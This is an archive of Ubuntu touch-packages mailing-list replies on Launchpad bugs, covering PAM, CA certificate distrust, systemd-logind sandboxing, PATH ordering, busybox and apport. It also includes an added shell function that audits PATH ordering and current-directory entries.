  Includes debian/watch file.
  A handful of lintian issues
  Quilt packaging.

  [Dependencies]
  libpcsc-perl depends upon libpcsclite1, libc6, perl, perlapi-5.30.0.
  All are in main.

  [Standards compliance]
  One oddity, Card.pod is 

[Touch-packages] [Bug 1860826] Re: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

2021-09-28 Thread Seth Arnold
Worked for me on my daily workstation:

⏚ [sarnold:~/trees] 100 $ sudo apt install -tfocal-proposed libpam0g libpam-runtime libpam-modules-bin libpam-modules
Reading package lists... Done
Building dependency tree   
Reading state information... Done
Recommended packages:
  update-motd
The following packages will be upgraded:
  libpam-modules libpam-modules-bin libpam-runtime libpam0g
4 upgraded, 0 newly installed, 0 to remove and 50 not upgraded.
Need to get 394 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam0g amd64 1.3.1-5ubuntu4.3 [55.4 kB]
Get:2 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam-modules-bin amd64 1.3.1-5ubuntu4.3 [41.2 kB]
Get:3 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam-modules amd64 1.3.1-5ubuntu4.3 [260 kB]
Get:4 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam-runtime all 1.3.1-5ubuntu4.3 [37.3 kB]
Fetched 394 kB in 0s (10.6 MB/s)  
Preconfiguring packages ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam0g_1.3.1-5ubuntu4.3_amd64.deb ...
Unpacking libpam0g:amd64 (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam0g:amd64 (1.3.1-5ubuntu4.3) ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam-modules-bin_1.3.1-5ubuntu4.3_amd64.deb ...
Unpacking libpam-modules-bin (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam-modules-bin (1.3.1-5ubuntu4.3) ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam-modules_1.3.1-5ubuntu4.3_amd64.deb ...
Unpacking libpam-modules:amd64 (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam-modules:amd64 (1.3.1-5ubuntu4.3) ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam-runtime_1.3.1-5ubuntu4.3_all.deb ...
Unpacking libpam-runtime (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam-runtime (1.3.1-5ubuntu4.3) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for libc-bin (2.31-0ubuntu9.2) ...
⏚ [sarnold:~/trees] 7s $ sudo -k ; sudo ls 
[sudo] password for sarnold: 
...

recent journal entries:
Sep 28 20:24:43 millbarge sudo[540916]: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory
Sep 28 20:24:45 millbarge sudo[540916]: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

and journal entries from an authentication performed after installing
the update:

Sep 28 20:27:14 millbarge audit[548532]: SYSCALL arch=c03e syscall=59 success=yes exit=0 a0=55bfed873130 a1=55bfed6fa4f0 a2=55bfed8b1910 a3=8 items=2 ppid=19448 pid=548532 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts2 ses=4 comm="sudo" exe="/usr/bin/sudo" key="execpriv"
Sep 28 20:27:14 millbarge audit: EXECVE argc=2 a0="sudo" a1="-k"
Sep 28 20:27:14 millbarge audit: CWD cwd="/home/sarnold/trees"
Sep 28 20:27:14 millbarge audit: PATH item=0 name="/usr/bin/sudo" inode=814680 dev=00:1c mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PATH item=1 name="/lib64/ld-linux-x86-64.so.2" inode=452898 dev=00:1c mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PROCTITLE proctitle=7375646F002D6B
Sep 28 20:27:14 millbarge audit[548533]: SYSCALL arch=c03e syscall=59 success=yes exit=0 a0=55bfed6ddf40 a1=55bfed727b00 a2=55bfed8b1910 a3=8 items=2 ppid=19448 pid=548533 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts2 ses=4 comm="sudo" exe="/usr/bin/sudo" key="execpriv"
Sep 28 20:27:14 millbarge audit: EXECVE argc=2 a0="sudo" a1="ls"
Sep 28 20:27:14 millbarge audit: CWD cwd="/home/sarnold/trees"
Sep 28 20:27:14 millbarge audit: PATH item=0 name="/usr/bin/sudo" inode=814680 dev=00:1c mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PATH item=1 name="/lib64/ld-linux-x86-64.so.2" inode=452898 dev=00:1c mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PROCTITLE proctitle=7375646F006C73
Sep 28 20:27:17 millbarge audit[548533]: USER_AUTH pid=548533 uid=1000 auid=1000 ses=4 msg='op=PAM:authentication grantors=pam_permit,pam_cap acct="sarnold" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/2 res=success'
Sep 28 20:27:17 millbarge audit[548533]: USER_ACCT pid=548533 uid=1000 auid=1000 ses=4 msg='op=PAM:accounting grantors=pam_permit acct="sarnold" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/2 res=success'
Sep 28 20:27:17 millbarge sudo[548533]:  sarnold 

[Touch-packages] [Bug 1944481] Re: Distrust "DST Root CA X3"

2021-09-24 Thread Seth Arnold
You can find older packages on the "full publishing history" from
launchpad:

https://launchpad.net/ubuntu/+source/ca-certificates/+publishinghistory

You can either download it manually or use the pull-lp-debs(1) command
from the ubuntu-dev-tools package.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1944481

Title:
  Distrust "DST Root CA X3"

Status in ca-certificates package in Ubuntu:
  Fix Committed
Status in ca-certificates source package in Trusty:
  Fix Released
Status in ca-certificates source package in Xenial:
  Fix Released
Status in ca-certificates source package in Bionic:
  Fix Released
Status in ca-certificates source package in Focal:
  Fix Released
Status in ca-certificates source package in Hirsute:
  Fix Released
Status in ca-certificates source package in Impish:
  Fix Committed

Bug description:
  [Impact]

   * ca-certificates trusts the letsencrypt CA certificate "ISRG Root X1"
   * ca-certificates also trusts the CA certificate "DST Root CA X3" which cross-signs letsencrypt CA
   * "DST Root CA X3" is about to expire, however it has issued an updated cross-signature to letsencrypt beyond its own expiry
   * This causes issues with older implementations of openssl & gnutls that reject such chains when offered to clients by servers.
   * We have provided fixes for openssl in xenial and gnutls in bionic/xenial, however trusty systems remain affected. Also any self built old copies of openssl/gnutls remain susceptible to this expiry.
   * One solution is to blacklist the "DST Root CA X3" from the ca-certificates package as described at https://blog.devgenius.io/rhel-centos-7-fix-for-lets-encrypt-change-8af2de587fe4 - connectivity to sites chained to "DST Root CA X3" will be unaffected, and servers that chain to both "ISRG Root X1" and "DST Root CA X3" should start to work unmodified.
   * This is similar to how this was handled for AddTrust before

  "* mozilla/blacklist.txt: blacklist expired AddTrust External Root
  CA."

  [Test Plan]

   * Install old/current ca-certificates faketime wget curl
  libcurl3-gnutls

  # faketime 2021-10-01 wget https://pskov.surgut.co.uk
  --2021-10-01 00:00:00--  https://pskov.surgut.co.uk/
  Resolving pskov.surgut.co.uk (pskov.surgut.co.uk)... 2a01:4f8:c17:3dd8::1, 49.12.37.5
  Connecting to pskov.surgut.co.uk (pskov.surgut.co.uk)|2a01:4f8:c17:3dd8::1|:443... connected.
  ERROR: cannot verify pskov.surgut.co.uk's certificate, issued by '/C=US/O=Let\'s Encrypt/CN=R3':
    Issued certificate has expired.
  To connect to pskov.surgut.co.uk insecurely, use `--no-check-certificate'.

  # LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4 faketime 2021-10-01 curl https://pskov.surgut.co.uk >/dev/null
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                   Dload  Upload   Total   Spent    Left  Speed
    0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  curl: (60) SSL certificate problem: certificate has expired

   * Install new ca-certificates package

  # faketime 2021-10-01 wget https://pskov.surgut.co.uk
  --2021-10-01 00:00:00--  https://pskov.surgut.co.uk/
  Resolving pskov.surgut.co.uk (pskov.surgut.co.uk)... 2a01:4f8:c17:3dd8::1, 49.12.37.5
  Connecting to pskov.surgut.co.uk (pskov.surgut.co.uk)|2a01:4f8:c17:3dd8::1|:443... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 612 [text/html]
  Saving to: 'index.html.3'

  100%[>] 612  --.-K/s   in 0s

  2021-10-01 00:00:00 (71.7 MB/s) - 'index.html.3' saved [612/612]

   LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4 faketime 2021-10-01 curl https://pskov.surgut.co.uk >/dev/null
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                   Dload  Upload   Total   Spent    Left  Speed
  100   612  100   612    0     0   5794      0 --:--:-- --:--:-- --:--:--  5828

  Download is successful.

  [Where problems could occur]

   * Connectivity to "DST Root CA X3" websites only, even under faketime
  set to dates prior to 30th of September 2021 will not work, as "DST
  Root CA X3" certificate is no longer installed. Users should locally
  install and enable that CA certificate, or allow dangerous unverified
  connectivity to websites using expired CA certs.

  [Other Info]

   * Related openssl and gnutls28 bugs are
  https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1928989 and
  https://bugs.launchpad.net/ubuntu/+source/gnutls28/+bug/1928648

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/1944481/+subscriptions



Re: [Touch-packages] [Bug 1934393] Re: systemd-logind network access is blocked, and breaks remote authentication configurations

2021-09-22 Thread Seth Arnold
I initially preferred your option two, a drop-in file in whichever nis
and ldap binary packages, on principle of trying to keep the mitigations
in place if we can.

But your case for a difficult debugging session is persuasive. Reading
the various bug reports around this, option three seems pretty bad --
none of those symptoms would make me think of changing a systemd hardening
configuration on a service I might not know I am running. Nothing really
looked obviously related to network-based id services. Trying to provide
documentation around that won't be very discoverable.

Ubuntu is supposed to be easy.

So, option one: removing the restrictions for systemd-logind in our
package.

It would be nice if our implementation of option one would make it very
easy to re-add the hardening setting; which we could then document in a
hardening guide.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1934393

Title:
  systemd-logind network access is blocked, and breaks remote
  authentication configurations

Status in systemd:
  Fix Released
Status in nis package in Ubuntu:
  Confirmed
Status in openldap package in Ubuntu:
  Confirmed
Status in systemd package in Ubuntu:
  Confirmed
Status in nis package in Debian:
  Fix Released

Bug description:
  [impact]

  starting in focal, systemd-logind runs sandboxed without any network
  access, which breaks any configuration that uses remote servers for
  user data, e.g. ldap, nis, etc

  A more full discussion is available in the upstream bug report as well
  as the debian bug report, see other info section below

  [test case]

  many possible ways to reproduce this; there are reproducers in some of
  the bugs reported before that are caused by this, e.g. bug 1915502 or
  bug 1916235

  [regression potential]

  failure to authenticate when using remote user data, incorrect
  authentication, security issues due to un-sandboxing of systemd-logind

  [scope]

  this is needed in f and later

  before focal, systemd-logind was not sandboxed so this did not apply

  [other info]

  this isn't actually a bug in systemd, this is a by-design security feature; see links below (and/or comment 13 in this bug) to upstream comments about how systemd's position is that no NSS module should ever perform network access, and any NSS module that does needs to also adjust the restrictions of systemd services such as systemd-logind, systemd-userdbd, and possibly others that might need to make NSS calls into glibc.
  https://github.com/systemd/systemd/issues/7074#issuecomment-338157851
  https://github.com/systemd/systemd/issues/15705#issuecomment-624125354

  this may also cause systemd-udevd failures in some cases as well.
  https://github.com/systemd/systemd/pull/7343#issuecomment-344800313

  For reference, upstream discussion around the systemd-logind sandboxing specifically:
  https://github.com/systemd/systemd/issues/7074
  upstream updated doc PR explaining the upstream position:
  https://github.com/systemd/systemd/pull/7343

  Debian bug report:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=878625
  Note that while this Debian bug is marked as fix released, I don't think it actually fixes the problem, from the final comment it seems like the only change was to add Recommends: nscd, which doesn't really solve things if someone doesn't use nscd.

To manage notifications about this bug go to:
https://bugs.launchpad.net/systemd/+bug/1934393/+subscriptions




[Touch-packages] [Bug 1944006] Re: focal cloud image on kvm does not have ip_tables kernel module

2021-09-17 Thread Seth Arnold
Hello, can you please look for ip_tables.ko in
/lib/modules/*/kernel/net/ipv4/netfilter/ip_tables.ko ? Which
linux-modules-* package and which linux-image-* packages do you have
installed?

Thanks

** Package changed: iptables (Ubuntu) => linux (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to iptables in Ubuntu.
https://bugs.launchpad.net/bugs/1944006

Title:
  focal cloud image on kvm does not have ip_tables kernel module

Status in linux package in Ubuntu:
  New

Bug description:
  
  $ sudo iptables -L
  modprobe: FATAL: Module ip_tables not found in directory /lib/modules/5.4.0-84-generic
  iptables v1.6.1: can't initialize iptables table `filter': Table does not exist (do you need to insmod?)
  Perhaps iptables or your kernel needs to be upgraded.

  
  No ip_tables.ko
  ```
  $ ls -l /lib/modules/`uname -r`/kernel/net/ipv4
  total 24
  -rw-r--r-- 1 root root 11257 Aug 26 18:48 gre.ko
  -rw-r--r-- 1 root root 12161 Aug 26 18:48 udp_tunnel.ko
  ```

  Cloud images downloaded from - http://cloud-images.ubuntu.com/releases/focal/release/
  ```
  $ ls -l
  total 569308
  -rw-rw-r-- 1 rtip rtip 543817728 Sep  7 17:35 ubuntu-20.04-server-cloudimg-amd64-disk-kvm.img
  -rw-rw-r-- 1 libvirt-qemu kvm   27373249 Sep  7 17:37 ubuntu-20.04-server-cloudimg-amd64-initrd-generic
  -rw-rw-r-- 1 libvirt-qemu kvm   11776256 Sep  7 17:37 ubuntu-20.04-server-cloudimg-amd64-vmlinuz-generic
  ```

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: iptables 1.6.1-2ubuntu2
  ProcVersionSignature: Ubuntu 5.4.0-84.94-generic 5.4.133
  Uname: Linux 5.4.0-84-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.26
  Architecture: amd64
  Date: Fri Sep 17 20:57:42 2021
  ProcEnviron:
   LANG=C.UTF-8
   SHELL=/bin/bash
   TERM=vt220
   XDG_RUNTIME_DIR=
   PATH=(custom, no user)
  SourcePackage: iptables
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1944006/+subscriptions




Re: [Touch-packages] [Bug 1792004] Re: built-in PATH seems to have sbin and bin out of order; and inconsistent

2021-08-30 Thread Seth Arnold
On Tue, Aug 31, 2021 at 12:45:38AM -, Ubfan wrote:
> Since 20.04, there are no /bin and /sbin directories, they are just
> links to /usr/sbin and /usr/bin -- perhaps they should be eliminated
> from the default PATH.

Does it matter if you upgraded from 18.04 or 19.10 vs a fresh install?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1792004

Title:
  built-in PATH seems to have sbin and bin out of order; and
  inconsistent

Status in apt package in Ubuntu:
  Fix Released
Status in bash package in Ubuntu:
  Fix Released
Status in busybox package in Ubuntu:
  New
Status in dash package in Ubuntu:
  New
Status in dpkg package in Ubuntu:
  Won't Fix
Status in pam package in Ubuntu:
  New
Status in systemd package in Ubuntu:
  Invalid
Status in bash source package in Xenial:
  Fix Released
Status in bash source package in Bionic:
  Fix Released
Status in bash source package in Cosmic:
  Fix Released
Status in bash source package in Disco:
  Fix Released

Bug description:
  [Impact]

   * For consistency reasons sbin should be ordered before bin in PATH.

  [Test Case]

   * $ env -u PATH /bin/bash -c 'echo $PATH'

  And check that matching pairs in PATH, have /sbin variant leading /bin
  variant.

  [Regression Potential]

   * Ubuntu does not ship duplicate binaries, with different behaviour
  between /sbin and /bin, thus all binaries will continue to be found in
  all locations. Also PATH is normally already set in the environment,
  and this change only affects the fallback path when bash is executed
  without any environment, i.e. booting with 'init=/bin/bash'

  [Other Info]
   
   * Original bug report detailing inconsistent paths between various shells.

  ---

  
  $ env -u PATH /bin/sh -c 'echo $PATH'
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  $ env -u PATH /bin/dash -c 'echo $PATH'
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  $ systemd-run --unit test-env env # ... and check journal for PATH
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  $ env -u PATH /bin/bash -c 'echo $PATH'
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.

  $ env -u PATH /bin/busybox sh -c 'echo $PATH'
  /sbin:/usr/sbin:/bin:/usr/bin

  $ grep 'export PATH=' -r initramfs-tools-0.131ubuntu10/
  initramfs-tools-0.131ubuntu10/mkinitramfs:export PATH='/usr/bin:/sbin:/bin'
  initramfs-tools-0.131ubuntu10/init:export PATH=/sbin:/usr/sbin:/bin:/usr/bin

  dracut.sh has DRACUT_PATH=${DRACUT_PATH:-/sbin /bin /usr/sbin /usr/bin} exported as PATH
  dracut-047+31/modules.d/99shutdown/shutdown.sh:export PATH=/usr/sbin:/usr/bin:/sbin:/bin

  $ cat /etc/environment
  PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"

  apt & dpkg => should probably initiate /usr/local-less PATH

  Imho the rest should probably be harmonised to:

  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

  ===

  From a duplicate
  https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1614080 :

  $ for i in 12.04 12.10 13.04 13.10 14.04 14.10 15.04 15.10 16.04; do echo $i; docker run -it --rm ubuntu:$i bash -c "unset PATH; /bin/bash -c 'echo \$PATH'"; done
  12.04
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  12.10
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  13.04
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  13.10
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  14.04
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  14.10
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  15.04
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  15.10
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  16.04
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.

  I believe later releases of bash, do too include CWD in the built-in
  PATH.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1792004/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
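
The [Test Case] in the bug above asks for a by-eye check that every /sbin directory precedes its /bin counterpart, and the bash fallback PATH it quotes also ends in "." (the current directory). The POSIX shell function below automates both checks on a PATH string. It is an added example, not part of the original bug report or of any Ubuntu package; the name path_audit and its output labels are made up for illustration.

```shell
#!/bin/sh
# path_audit PATHSTRING   (hypothetical helper, added for illustration)
# Prints one finding per line and nothing when the PATH is clean:
#   cwd:N          entry N (1-based) is "." or empty, i.e. the current directory
#   relative:N:E   entry N is the relative path E
#   order:PREFIX   PREFIX/bin is searched before PREFIX/sbin
path_audit() {
    _rest=$1
    _n=0
    _seen=":"            # ":"-delimited record of entries already walked
    while :; do
        # Peel off the first entry; an empty field between colons is kept,
        # because the shell treats it as the current directory.
        case $_rest in
            *:*) _entry=${_rest%%:*}; _rest=${_rest#*:}; _last=0 ;;
            *)   _entry=$_rest; _last=1 ;;
        esac
        _n=$((_n + 1))
        case $_entry in
            ''|.)
                printf 'cwd:%s\n' "$_n" ;;
            /*)
                case $_entry in
                    */sbin)
                        _prefix=${_entry%/sbin}
                        # Was the matching bin directory already listed?
                        case $_seen in
                            *":$_prefix/bin:"*)
                                printf 'order:%s\n' "${_prefix:-/}" ;;
                        esac ;;
                esac ;;
            *)
                printf 'relative:%s:%s\n' "$_n" "$_entry" ;;
        esac
        _seen="$_seen$_entry:"
        if [ "$_last" -eq 1 ]; then
            break
        fi
    done
}

# Fallback PATH values quoted in the bug report above.
DASH_PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
BASH_PATH="/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:."
BUSYBOX_PATH="/sbin:/usr/sbin:/bin:/usr/bin"

for _p in "$DASH_PATH" "$BASH_PATH" "$BUSYBOX_PATH"; do
    printf '%s\n' "$_p"
    path_audit "$_p" | sed 's/^/    finding: /'
done
```

To audit the fallback of the shell actually installed, pass it the output of the test case command, for example path_audit "$(env -u PATH /bin/bash -c 'echo $PATH')".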


[Touch-packages] [Bug 1933979] Re: [MIR] busybox package

2021-08-10 Thread Seth Arnold
Just how bad are the consequences of not promoting this package to main?

The code is fairly gross. There's absolute gobs of writing outside array
bounds, resource leaks, potential uses of uninitialized variables, etc.

I don't know if there's any security-relevant findings -- busybox is
almost always restricted solely to a system administrator who is in
trouble and needs tools and can't have the Good Tools for whatever
reason, so a lot of the choices sort of make sense. However, there's
just a lot of choices that may have made sense thirty years ago that
just don't make sense today, and a lot of the choices make it much
harder to use Coverity or similar tools to find the real bugs.

Actually bringing the entire codebase up to modern standards is not
going to be cost-effective (and probably not within the goals of the
project).

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to busybox in Ubuntu.
https://bugs.launchpad.net/bugs/1933979

Title:
   [MIR] busybox package

Status in busybox package in Ubuntu:
  New

Bug description:
  [Availability]
  ==
  src:busybox was introduced in Dapper (2006) and has been in main since then. src:busybox & bin:busybox-static are in main, to be more precise. And this request is to promote bin:busybox from src:busybox in main, too. It only depends on the libc6 package, which is in main already. The package builds on all the architectures; is Arch:any.

  [Rationale]
  ===
  This package is to be included in our partner's cloud images, going back to Bionic. As cloud images are to ship only packages from main this request is to see that happen.

  [Security]
  ==
  The binary doesn't install services / daemons (/etc/init.d/*, /etc/init/*, /lib/systemd/system/*). Just ships the "busybox" binary, its docs, and a man page.

  [Dependencies]
  ==
  libc6, which is in main already.

  [Maintenance]
  =
  Server team.

  [Background information]
  
  Tiny utilities for small and embedded systems.

  ---
  Upstream: https://git.busybox.net/busybox/
  Launchpad page: https://launchpad.net/ubuntu/+source/busybox
  Ubuntu bugs: https://bugs.launchpad.net/ubuntu/+source/busybox
  Debian Package Tracker: https://tracker.debian.org/pkg/busybox
  Debian bugs: https://bugs.debian.org/cgi-bin/pkgreport.cgi?repeatmerged=no=busybox

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/busybox/+bug/1933979/+subscriptions




[Touch-packages] [Bug 1935076] Re: ubuntu-bug sends huge amounts of internal data to public bugs without asking for permission

2021-08-10 Thread Seth Arnold
dmesg in bug reports is fantastically helpful: it is a very fast and
reliable way to diagnose many classes of hardware problems or filesystem
flaws or kernel module incompatibilities that show up to the user as
bugs in their programs. Having it available has saved both developers
and users a *lot* of time.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1935076

Title:
  ubuntu-bug sends huge amounts of internal data to public bugs without
  asking for permission

Status in apport package in Ubuntu:
  Confirmed

Bug description:
  I just created a bug with "ubuntu-bug -w" as recommended by the bug
  reporting guidelines.

  After creating it, I saw that without my confirmations many files with
  detailed output about my machine, ip and process environments and
  connected hardware etc have been collected, uploaded to launchpad and
  made publicly visible without my permission, and without any
  possibility to remove it again and select myself what I want to
  disclose.

  This is a serious security and privacy issue opinion.

  Please tell me ASAP how I can delete my data that I do not want to be
  publicly available.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.10
  Package: apport-gtk 2.20.11-0ubuntu50.7
  ProcVersionSignature: Ubuntu 5.8.0-59.66-lowlatency 5.8.18
  Uname: Linux 5.8.0-59-lowlatency x86_64
  ApportVersion: 2.20.11-0ubuntu50.7
  Architecture: amd64
  CasperMD5CheckResult: skip
  CrashReports:
   644:1000:124:0:2021-07-08 04:45:57.713189974 +0200:2021-07-08 04:45:57.713189974 +0200:/var/crash/_usr_bin_jackd.1000.upload
   640:1000:124:173589:2021-07-08 04:45:57.713189974 +0200:2021-07-08 04:45:57.713189974 +0200:/var/crash/_usr_bin_jackd.1000.crash
   600:118:124:37:2021-07-08 04:46:00.914606508 +0200:2021-07-08 04:46:00.906605467 +0200:/var/crash/_usr_bin_jackd.1000.uploaded
  CurrentDesktop: ubuntu:GNOME
  Date: Thu Jul  8 21:01:23 2021
  ExecutablePath: /usr/share/apport/apport-gtk
  InstallationDate: Installed on 2020-04-12 (451 days ago)
  InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017)
  InterpreterPath: /usr/bin/python3.8
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.6-0ubuntu1
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  SourcePackage: apport
  UpgradeStatus: Upgraded to groovy on 2020-11-03 (247 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1935076/+subscriptions




[Touch-packages] [Bug 1427600] Re: apport-unpack: ValueError: ['UserGroups'] has no binary content

2021-07-27 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1427600

Title:
  apport-unpack: ValueError: ['UserGroups'] has no binary content

Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Xenial:
  Triaged
Status in apport source package in Focal:
  Fix Released
Status in apport source package in Groovy:
  Fix Released

Bug description:
  [Impact]
  apport-unpack crashes when trying to unpack a crash

  [Test Case]
  On a system running 20.04 LTS:
  1) create an additional user who is only a member of their own group e.g.
  bdmurray@clean-focal-amd64:~$ id crashy
  uid=1001(crashy) gid=1001(crashy) groups=1001(crashy)
  2) Launch a process as that user
  3) kill -11 that process
  4) Confirm there is a crash file in /var/crash for that process
  5) Run apport-unpack on that .crash file

  With the version of apport from -proposed you will not get another
  crash file when unpacking the crash file.

  [Regression Potential]
  We are just setting UserGroups to 'N/A' as opposed to having it be completely empty so there isn't any chance for regression.

  When running apport-unpack to get at a core dump

  laney@raleigh> sudo apport-unpack _usr_lib_x86_64-linux-gnu_urfkill_urfkilld.0.crash ~/temp/zozoz
  [sudo] password for laney:
  Traceback (most recent call last):
    File "/usr/bin/apport-unpack", line 73, in <module>
      pr.extract_keys(f, bin_keys, dir)
    File "/usr/lib/python3/dist-packages/problem_report.py", line 253, in extract_keys
      [item for item, element in b64_block.items() if element is False])
  ValueError: ['UserGroups'] has no binary content
  laney@raleigh> apport-cli --version
  2.16.2

  It's not terrible, because most files are unpacked (those which sort
  before UserGroups, I guess).

  ProblemType: Bug
  DistroRelease: Ubuntu 15.04
  Package: apport 2.16.2-0ubuntu1
  ProcVersionSignature: Ubuntu 3.19.0-7.7-generic 3.19.0
  Uname: Linux 3.19.0-7-generic x86_64
  ApportLog:

  ApportVersion: 2.16.2-0ubuntu1
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Tue Mar  3 10:09:26 2015
  InstallationDate: Installed on 2012-10-07 (876 days ago)
  InstallationMedia: Ubuntu 12.10 "Quantal Quetzal" - Beta amd64 (20121007)
  PackageArchitecture: all
  SourcePackage: apport
  UpgradeStatus: Upgraded to vivid on 2013-05-07 (665 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1427600/+subscriptions




[Touch-packages] [Bug 1937071] Re: package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade: installed initramfs-tools package post-installation script subprocess returned error exit status 1

2021-07-21 Thread Seth Arnold
Hello Rucel, my guess is you've installed the lilo package. This is not
supported. If you can identify a bugfix it could probably be integrated
but honestly it'd be easier to either figure out how to use grub in your
environment or switch to another distribution that does support using
lilo. Grub just works for most people, and it should work for you, too.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1937071

Title:
  package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade:
  installed initramfs-tools package post-installation script subprocess
  returned error exit status 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  it does not complete the update

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: initramfs-tools 0.136ubuntu6.6
